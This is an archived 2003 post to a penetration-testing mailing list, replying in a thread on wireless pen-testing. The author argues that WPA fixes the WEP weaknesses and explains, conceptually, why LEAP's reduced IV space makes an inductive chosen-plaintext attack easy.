Penetration Testing mailing list archives
Re: Wireless Pent-Test
From: Michael Sierchio <kudzu () tenebras com>
Date: Mon, 06 Oct 2003 16:53:34 -0700
R. DuFresne wrote:
there was a FD posting last week that indicated that cisco's LEAP was also insecure and borked. The thing is, a wireless lan should be considered untrustworthy, or at least untrusted, all traffic into the wired net has to be tunneled and safely wrapped in encryption, and there has to be a better auth mech to allow the tunnel access thn what is provided in simple AP/laptop setups. Network Mag had some interesting articles lately, one in July mentioneing some newer AP gateway systems coming into play, but, they are not cheap, and not for small to medium biz folks. Our impression, and mirroed by lawerence livermore, wireless is not ready for prime time play.
WPA is probably ready for prime time -- it solved the WEP vulnerabilities without introducing new ones (as LEAP did). The problem with LEAP is that the IV space was effectively reduced to the point where the Inductive Chosen-Plaintext Attack became trivially easy. This allows complete use of the access without ever recovering the WEP key. Fluhrer-Mantin-Shamir won't work if the key isn't weak. The major difference is that the inductive attack is an active attack which uses the AP as an oracle, but decryption errors aren't ever reported to the upper layers anyway -- they're just silently dropped. WPA was a solution with a strict set of constraints -- mostly the 25-33MHz ARM or 486-equiv processors in the existing APs. Even in the most grandiose of IEEE schemes, management frames aren't encrypted, so there's lots of fun to be had. -- "Well," Brahma said, "even after ten thousand explanations, a fool is no wiser, but an intelligent man requires only two thousand five hundred." - The Mahabharata --------------------------------------------------------------------------- Tired of constantly searching the web for the latest exploits? Tired of using 300 different tools to do one job? Get CORE IMPACT and get some rest. www.coresecurity.com/promos/sf_ept2 ----------------------------------------------------------------------------
Current thread:
- Wireless Pent-Test Cesar Diaz (Oct 06)
- Re: Wireless Pent-Test Daniel Nylander (Oct 06)
- Re: Wireless Pent-Test Matthew Leeds (Oct 06)
- Re: Wireless Pent-Test R. DuFresne (Oct 06)
- Re: Wireless Pent-Test Gregory Spath (Oct 06)
- Re: Wireless Pent-Test Seth Fogie (Oct 06)
- Re: Wireless Pent-Test Michael Sierchio (Oct 07)
- RE: Wireless Pent-Test Christopher Harrington (Oct 06)
- Re: Wireless Pent-Test Raistlin (Oct 07)
- Re: Wireless Pent-Test Cedric Blancher (Oct 08)
- Re: Wireless Pent-Test Raistlin (Oct 08)
- Re: Wireless Pent-Test Matthew Leeds (Oct 06)
- Re: Wireless Pent-Test Daniel Nylander (Oct 06)
- Re: Wireless Pent-Test n0g0013 (Oct 07)
- Re: Wireless Pent-Test goat (Oct 06)
- <Possible follow-ups>
- RE: Wireless Pent-Test Artes, Francisco (Oct 06)